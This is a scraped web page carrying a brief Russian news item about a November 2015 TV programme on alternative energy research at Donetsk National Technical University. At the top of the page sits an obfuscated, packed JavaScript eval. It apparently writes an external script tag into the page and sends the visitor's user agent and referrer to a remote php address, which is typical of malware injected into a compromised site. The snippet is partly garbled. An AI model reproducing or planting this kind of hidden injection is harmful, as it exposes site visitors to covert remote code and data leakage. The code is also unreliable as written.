

```
6 eval(function(p,a,c,k,e,d){e=function(c){return
c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e)
{return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n
m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|
97|language|jquery|userAgent|navigator|script|rehzs|var|u0026u|referrer|dhkrm||js|php'.split('|'),0
,{}))
```

ноября 2015 г. в эфир Первого республиканского канала вышла телевизионная передача "Тропую знаний", посвященная Альтернативной энергетике в Донецком национальном техническом университете (ДонНТУ). Съёмки телевизионной передачи проходили в лабораториях университета при участии Студенческого телевидения (СтудТВ) ДонНТУ. В передаче ведущие ученые университета рассказали о достижениях в области возобновляемых источников энергии, солнечной, водородной и др. видах энергетике, о перспективах их освоения и др. вопросах.